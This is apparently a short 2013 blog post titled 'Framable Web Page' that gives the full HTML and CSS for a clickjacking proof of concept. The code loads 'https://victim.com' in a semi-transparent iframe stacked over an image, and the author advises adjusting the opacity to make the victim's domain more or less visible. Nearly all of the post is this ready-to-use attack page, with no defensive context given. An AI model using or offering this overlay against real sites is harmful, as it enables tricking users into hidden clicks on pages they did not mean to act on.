Monday, April 8, 2013

Framable Web Page

Just a quick post to show you the code which can be used to frame a page inside your domain.
1:  <html>  
2:  <HEAD></HEAD>  
3:  <body>  
4:  <style>  
5:  iframe{  
6:  filter:alpha(opacity=0.2);opacity: 0.2;  
7:  position: absolute;top: 0px;left: 0px;  
8:  height: 500px;width: 600px;  
9:  }  
10:  img{  
11:  position: absolute;top: 0px;left: 0px;  
12:  height: 640px;width: 640px;  
13:  }  
14:  </style>  
15:  <img src="bushido.jpg">  
16:  <iframe src="https://victim.com"></iframe>  
17:  </body>  
18:  </html>  
You just need to adjust the opacity to make the victim's domain more or less visible.